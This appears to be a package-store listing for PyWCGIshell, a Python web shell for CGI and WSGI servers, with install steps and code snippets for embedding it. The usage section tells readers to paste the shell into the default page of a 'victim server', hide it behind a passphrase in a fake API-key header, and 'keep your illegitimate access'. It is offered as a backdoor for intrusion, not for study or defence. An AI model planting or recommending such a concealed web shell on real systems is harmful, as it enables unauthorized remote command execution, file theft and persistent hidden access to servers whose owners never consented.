PyWCGIshell 1.1.0
Last updated:
0 purchases
Description:
PyWCGIshell 1.1.0
PyWCGIshell
Description
This package implement a WebShell for CGI and WSGI server.
With this WebShell you can:
explore directories and download files
execute command lines (with command history)
show basic informations about environment server
show environments variables
Requirements
This package require :
python3
python3 Standard Library
Installation
pip install PyWCGIshell
Usages
Command line
(Command line is useful to try the webshell)
python3 -m PyWCGIshell wsgi # Try it in wsgi mode
Python script
CGI page
from PyWCGIshell import WebShell
def my_default_cgi_page():
print("Content-type:text/plain; charset=utf-8")
print("")
print("Hello World !")
webshell = WebShell()
webshell.standard_page = my_default_cgi_page
webshell.run()
WSGI page
from PyWCGIshell import WebShell
def my_default_wsgi_page(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
return [b"Hello World !"]
webshell = WebShell(type_="wsgi")
webshell.standard_page = my_default_wsgi_page
application = webshell.run
# Apache with mod_wsgi use the "application" as default function
WebShell options
from PyWCGIshell import WebShell
webshell = WebShell(type_="cgi", passphrase="SHELL", pass_type="method")
webshell.run()
I don't recommend using method like pass_type to hide your WebShell.
You can use similar configuration to hide your WebShell.
from PyWCGIshell import WebShell
webshell = WebShell(type_="wsgi", passphrase="<inexistant api key>", pass_type="header_value")
application = webshell.run
To use this WebShell:
Configure (server type, passphrase and passphrase location) and copy the WebShell code or install it
Paste it in the default page of the victim server or import it
Send a request with the passphrase and exploit the weak server
Example
Install and configure PyWCGIshell on WebScripts to keep your illegitimate access and hide it (repo is here).
WebShell on WebScripts - Youtube
Links
Github Page
Documentation
Pypi package
Licence
Licensed under the GPL, version 3.
License:
For personal and professional use. You cannot resell or redistribute these repositories in their original state.
Customer Reviews
There are no reviews.
